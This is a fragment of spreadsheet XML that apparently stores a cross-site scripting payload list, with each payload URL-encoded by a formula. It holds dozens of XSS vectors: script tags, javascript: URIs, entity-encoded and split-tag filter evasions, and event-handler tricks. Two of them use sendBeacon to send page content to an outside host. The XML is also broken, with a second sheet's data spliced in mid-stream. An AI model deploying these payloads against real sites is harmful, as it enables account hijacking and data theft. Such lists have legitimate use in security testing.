      <c r="B2578" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2522%253e%253cscript%253ealert%28%27XSS%27%29%253c%2Fscript%253e</v>
      </c>
    </row>
    <row r="2579">
      <c r="A2579" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B2579" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2580">
      <c r="A2580" s="3" t="s">
        <v>657</v>
      </c>
      <c r="B2580" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E</v>
      </c>
    </row>
    <row r="2581">
      <c r="A2581" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B2581" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="2582">
      <c r="A2582" s="3" t="s">
        <v>659</v>
      </c>
      <c r="B2582" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dxss%20onerror%3Dalert%281%29%3E</v>
      </c>
    </row>
    <row r="2583">
      <c r="A2583" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B2583" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="2584">
      <c r="A2584" s="3" t="s">
        <v>472</v>
      </c>
      <c r="B2584" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E</v>
      </c>
    </row>
    <row r="2585">
      <c r="A2585" s="3" t="s">
        <v>1053</v>
      </c>
      <c r="B2585" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%20ascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2586">
      <c r="A2586" s="3" t="s">
        <v>480</v>
      </c>
      <c r="B2586" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2587">
      <c r="A2587" s="3" t="s">
        <v>476</v>
      </c>
      <c r="B2587" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E</v>
      </c>
    </row>
    <row r="2588">
      <c r="A2588" s="3" t="s">
        <v>477</v>
      </c>
      <c r="B2588" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E</v>
      </c>
    </row>
    <row r="2589">
      <c r="A2589" s="3" t="s">
        <v>478</v>
      </c>
      <c r="B2589" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E</v>
      </c>
    </row>
    <row r="2590">
      <c r="A2590" s="3" t="s">
        <v>496</v>
      </c>
      <c r="B2590" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="2591">
      <c r="A2591" s="3" t="s">
        <v>502</v>
      </c>
      <c r="B2591" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Dalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="2592">
      <c r="A2592" s="3" t="s">
        <v>495</v>
      </c>
      <c r="B2592" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2593">
      <c r="A2593" s="3" t="s">
        <v>491</v>
      </c>
      <c r="B2593" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22</v>
      </c>
    </row>
    <row r="2594">
      <c r="A2594" s="3" t="s">
        <v>492</v>
      </c>
      <c r="B2594" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%20%3C</v>
      </c>
    </row>
    <row r="2595">
      <c r="A2595" s="3" t="s">
        <v>488</v>
      </c>
      <c r="B2595" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="2596">
      <c r="A2596" s="3" t="s">
        <v>668</v>
      </c>
      <c r="B2596" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%25253cscript%25253ealert%281%29%25253c%2Fscript%25253e</v>
      </c>
    </row>
    <row r="2597">
      <c r="A2597" s="3" t="s">
        <v>1494</v>
      </c>
      <c r="B2597" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cs%252b%22cript%3Ealert%28document.cookie%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2598">
      <c r="A2598" s="3" t="s">
        <v>670</v>
      </c>
      <c r="B2598" s="4" t="str">
        <f t="shared" si="1"/>
        <v>foo%3Cscript%3Ealert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2599">
      <c r="A2599" s="3" t="s">
        <v>671</v>
      </c>
      <c r="B2599" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C%2Fscr%3C%2Fscript%3Eipt%3E</v>
      </c>
    </row>
    <row r="2600">
      <c r="A2600" s="3" t="s">
        <v>662</v>
      </c>
      <c r="B2600" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3EString.fromCharCode%2897%2C%20108%2C%20101%2C%20114%2C%20116%2C%2040%2C%2049%2C%2041%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="2601">
      <c r="A2601" s="5" t="s">
        <v>887</v>
      </c>
      <c r="B2601" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="2602">
      <c r="A2602" s="3" t="s">
        <v>1495</v>
      </c>
      <c r="B2602" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onstart%3D%27javascript%3Aalert%28%271%27%29%3B%27%3E%3D%28%E2%97%95_%E2%97%95%29%3D</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="F4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6.63"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="2" t="s">
        <v>1496</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1497</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="9" t="s">
        <v>1498</v>
      </c>
      <c r="B2" s="4" t="str">
        <f t="shared" ref="B2:B77" si="1">ENCODEURL(A2)</f>
        <v>%3Cxss%20id%3Dx%20tabindex%3D1%20onactivate%3Dalert%281%29%3E%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="9" t="s">
        <v>1499</v>
      </c>
      <c r="B3" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onafterscriptexecute%3Dalert%281%29%3E%3Cscript%3E1%3C%2Fscript%3E</v>
      </c>
      <c r="E3" s="10" t="s">
        <v>1500</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="9" t="s">
        <v>1501</v>
      </c>
      <c r="B4" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40keyframes%20x%7Bfrom%20%7Bleft%3A0%3B%7Dto%20%7Bleft%3A%201000px%3B%7D%7D%3Atarget%20%7Banimation%3A10s%20ease-in-out%200s%201%20x%3B%7D%3C%2Fstyle%3E%3Cxss%20id%3Dx%20style%3D%22position%3Aabsolute%3B%22%20onanimationcancel%3D%22print%28%29%22%3E%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="9" t="s">
        <v>1502</v>
      </c>
      <c r="B5" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40keyframes%20x%7B%7D%3C%2Fstyle%3E%3Cxss%20style%3D%22animation-name%3Ax%22%20onanimationend%3D%22alert%281%29%22%3E%3C%2Fxss%3E</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>1503</v>
      </c>
      <c r="F5" s="11" t="s">
        <v>1504</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="9" t="s">
        <v>1505</v>
      </c>
      <c r="B6" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40keyframes%20slidein%20%7B%7D%3C%2Fstyle%3E%3Cxss%20style%3D%22animation-duration%3A1s%3Banimation-name%3Aslidein%3Banimation-iteration-count%3A2%22%20onanimationiteration%3D%22alert%281%29%22%3E%3C%2Fxss%3E</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>1506</v>
      </c>
      <c r="F6" s="3">
        <v>42.0</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="9" t="s">
        <v>1507</v>
      </c>
      <c r="B7" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20id%3Dx%20tabindex%3D1%20onbeforeactivate%3Dalert%281%29%3E%3C%2Fxss%3E</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>1508</v>
      </c>
      <c r="F7" s="3">
        <v>34.0</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="9" t="s">
        <v>1509</v>
      </c>
      <c r="B8" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20id%3Dx%20tabindex%3D1%20onbeforedeactivate%3Dprint%28%29%3E%3C%2Fxss%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="9" t="s">
        <v>1510</v>
      </c>
      <c r="B9" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onbeforeprint%3Dconsole.log%281%29%3E</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="9" t="s">
        <v>1511</v>
      </c>
      <c r="B10" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onbeforescriptexecute%3Dalert%281%29%3E%3Cscript%3E1%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="9" t="s">
        <v>1512</v>
      </c>
      <c r="B11" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onbeforeunload%3Dnavigator.sendBeacon%28%27%2F%2Fhttps%3A%2F%2Fssl.portswigger-labs.net%2F%27%2Cdocument.body.innerHTML%29%3E</v>
      </c>
    </row>
    <row r="12" ht="16.5" customHeight="1">
      <c r="A12" s="12" t="s">
        <v>1513</v>
      </c>
      <c r="B12" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Canimate%20onbegin%3Dalert%281%29%20attributeName%3Dx%20dur%3D1s%3E</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="9" t="s">
        <v>1514</v>
      </c>
      <c r="B13" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onfocusout%3Dalert%281%29%20id%3Dx%20tabindex%3D1%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E%3Cinput%20value%3Dclickme%3E</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="9" t="s">
        <v>1515</v>
      </c>
      <c r="B14" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%20onfullscreenchange%3Dalert%281%29%20src%3Dvalidvideo.mp4%20controls%3E</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="9" t="s">
        <v>1516</v>
      </c>
      <c r="B15" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20oninput%3Dalert%281%29%20value%3Dxss%3E</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="9" t="s">
        <v>1517</v>
      </c>
      <c r="B16" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cinput%20oninvalid%3Dalert%281%29%20required%3E%3Cinput%20type%3Dsubmit%3E</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="9" t="s">
        <v>1518</v>
      </c>
      <c r="B17" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onkeydown%3D%22alert%281%29%22%20contenteditable%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="9" t="s">
        <v>1519</v>
      </c>
      <c r="B18" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onkeypress%3D%22alert%281%29%22%20contenteditable%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="9" t="s">
        <v>1520</v>
      </c>
      <c r="B19" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onkeyup%3D%22alert%281%29%22%20contenteditable%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="9" t="s">
        <v>1521</v>
      </c>
      <c r="B20" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onmousedown%3D%22alert%281%29%22%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="9" t="s">
        <v>1522</v>
      </c>
      <c r="B21" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onmouseenter%3D%22alert%281%29%22%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="9" t="s">
        <v>1523</v>
      </c>
      <c r="B22" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onmouseleave%3D%22alert%281%29%22%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="9" t="s">
        <v>1524</v>
      </c>
      <c r="B23" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onmousemove%3D%22alert%281%29%22%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="9" t="s">
        <v>1525</v>
      </c>
      <c r="B24" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onmouseout%3D%22alert%281%29%22%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="9" t="s">
        <v>1526</v>
      </c>
      <c r="B25" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onmouseover%3D%22alert%281%29%22%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="9" t="s">
        <v>1527</v>
      </c>
      <c r="B26" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onmouseup%3D%22alert%281%29%22%20style%3Ddisplay%3Ablock%3Etest%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="9" t="s">
        <v>1528</v>
      </c>
      <c r="B27" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onmousewheel%3Dalert%281%29%20style%3Ddisplay%3Ablock%3Erequires%20scrolling</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="9" t="s">
        <v>1529</v>
      </c>
      <c r="B28" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%20onmozfullscreenchange%3Dalert%281%29%20src%3Dvalidvideo.mp4%20controls%3E</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="9" t="s">
        <v>1530</v>
      </c>
      <c r="B29" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onpagehide%3Dnavigator.sendBeacon%28%27%2F%2Fhttps%3A%2F%2Fssl.portswigger-labs.net%2F%27%2Cdocument.body.innerHTML%29%3E</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="9" t="s">
        <v>1531</v>
      </c>
      <c r="B30" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20onpaste%3D%22alert%281%29%22%20contenteditable%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="9" t="s">
        <v>1532</v>
      </c>
      <c r="B31" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Caudio%20autoplay%20controls%20onpause%3Dalert%281%29%3E%3Csource%20src%3D%22validaudio.wav%22%20type%3D%22audio%2Fwav%22%3E%3C%2Faudio%3E</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="9" t="s">
        <v>1533</v>
      </c>
      <c r="B32" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onpointerdown%3Dalert%281%29%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="9" t="s">
        <v>1534</v>
      </c>
      <c r="B33" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onpointerenter%3Dalert%281%29%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="9" t="s">
        <v>1535</v>
      </c>
      <c r="B34" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onpointerleave%3Dalert%281%29%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="9" t="s">
        <v>1536</v>
      </c>
      <c r="B35" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onpointermove%3Dalert%281%29%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="9" t="s">
        <v>1537</v>
      </c>
      <c r="B36" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onpointerout%3Dalert%281%29%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="9" t="s">
        <v>1538</v>
      </c>
      <c r="B37" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onpointerover%3Dalert%281%29%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="9" t="s">
        <v>1539</v>
      </c>
      <c r="B38" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onpointerrawupdate%3Dalert%281%29%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="9" t="s">
        <v>1540</v>
      </c>
      <c r="B39" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxss%20onpointerup%3Dalert%281%29%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fxss%3E</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="9" t="s">
        <v>1541</v>
      </c>
      <c r="B40" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%20onreset%3Dalert%281%29%3E%3Cinput%20type%3Dreset%3E</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="9" t="s">
        <v>1542</v>
      </c>
      <c r="B41" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cinput%20type%3Dsearch%20onsearch%3Dalert%281%29%20value%3D%22Hit%20return%22%20autofocus%3E</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="9" t="s">
        <v>1543</v>
      </c>
      <c r="B42" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Caudio%20autoplay%20controls%20onseeked%3Dalert%281%29%3E%3Csource%20src%3D%22validaudio.wav%22%20type%3D%22audio%2Fwav%22%3E%3C%2Faudio%3E</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="9" t="s">
        <v>1544</v>
      </c>
      <c r="B43" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Caudio%20autoplay%20controls%20onseeking%3Dalert%281%29%3E%3Csource%20src%3D%22validaudio.wav%22%20type%3D%22audio%2Fwav%22%3E%3C%2Faudio%3E</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="9" t="s">
        <v>1545</v>
      </c>
      <c r="B44" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20onselect%3Dalert%281%29%20value%3D%22XSS%22%20autofocus%3E</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="9" t="s">
        <v>1546</v>
      </c>
      <c r="B45" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onselectionchange%3Dalert%281%29%3Eselect%20some%20text</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="9" t="s">
        <v>1547</v>
      </c>
      <c r="B46" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20contextmenu%3Dxss%3E%3Cp%3ERight%20click%3Cmenu%20type%3Dcontext%20id%3Dxss%20onshow%3Dalert%281%29%3E%3C%2Fmenu%3E%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="9" t="s">
        <v>1548</v>
      </c>
      <c r="B47" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%20onsubmit%3Dalert%281%29%3E%3Cinput%20type%3Dsubmit%3E</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="9" t="s">
        <v>1549</v>
      </c>
      <c r="B48" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20ontouchend%3Dalert%281%29%3E%20</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="9" t="s">
        <v>1550</v>
      </c>
      <c r="B49" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20ontouchmove%3Dalert%281%29%3E%20</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="9" t="s">
        <v>1551</v>
      </c>
      <c r="B50" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Caudio%20autoplay%20controls%20onvolumechange%3Dalert%281%29%3E%3Csource%20src%3D%22validaudio.wav%22%20type%3D%22audio%2Fwav%22%3E%3C%2Faudio%3E</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="9" t="s">
        <v>1552</v>
      </c>
      <c r="B51" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onwheel%3Dalert%281%29%3E</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="9" t="s">
        <v>1553</v>
      </c>
      <c r="B52" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cnoembed%3E%3Cimg%20title%3D%22%3C%2Fnoembed%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fnoembed%3E</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="9" t="s">
        <v>1554</v>
      </c>
      <c r="B53" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cnoscript%3E%3Cimg%20title%3D%22%3C%2Fnoscript%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fnoscript%3E</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="9" t="s">
        <v>1555</v>
      </c>
      <c r="B54" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3Cimg%20title%3D%22%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="9" t="s">
        <v>1555</v>
      </c>
      <c r="B55" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3Cimg%20title%3D%22%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="9" t="s">
        <v>1555</v>
      </c>
      <c r="B56" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3Cimg%20title%3D%22%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="9" t="s">
        <v>1556</v>
      </c>
      <c r="B57" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%3E%3Cimg%20title%3D%22%3C%2Fiframe%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="9" t="s">
        <v>1557</v>
      </c>
      <c r="B58" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxmp%3E%3Cimg%20title%3D%22%3C%2Fxmp%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fxmp%3E</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="9" t="s">
        <v>1558</v>
      </c>
      <c r="B59" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctextarea%3E%3Cimg%20title%3D%22%3C%2Ftextarea%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Ftextarea%3E</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="9" t="s">
        <v>1559</v>
      </c>
      <c r="B60" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cnoframes%3E%3Cimg%20title%3D%22%3C%2Fnoframes%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fnoframes%3E</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="9" t="s">
        <v>1560</v>
      </c>
      <c r="B61" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctitle%3E%3Cimg%20title%3D%22%3C%2Ftitle%3E%3Cimg%20src%20onerror%3Dalert%281%29%3E%22%3E%3C%2Ftitle%3E</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="9" t="s">
        <v>1561</v>
      </c>
      <c r="B62" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Eonerror%3Dalert%3Bthrow%201%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="9" t="s">
        <v>1562</v>
      </c>
      <c r="B63" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%7Bonerror%3Dalert%7Dthrow%201%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="9" t="s">
        <v>1563</v>
      </c>
      <c r="B64" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ethrow%20onerror%3Dalert%2C1%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="9" t="s">
        <v>1564</v>
      </c>
      <c r="B65" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ethrow%20onerror%3Deval%2C%27%3Dalert%5Cx281%5Cx29%27%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="9" t="s">
        <v>1565</v>
      </c>
      <c r="B66" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%7Bonerror%3Deval%7Dthrow%7BlineNumber%3A1%2CcolumnNumber%3A1%2CfileName%3A1%2Cmessage%3A%27alert%5Cx281%5Cx29%27%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="9" t="s">
        <v>1566</v>
      </c>
      <c r="B67" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%27alert%5Cx281%5Cx29%27instanceof%7B%5BSymbol.hasInstance%5D%3Aeval%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="9" t="s">
        <v>1567</v>
      </c>
      <c r="B68" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%27alert%5Cx281%5Cx29%27instanceof%7B%5BSymbol%5B%27hasInstance%27%5D%5D%3Aeval%7D%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="9" t="s">
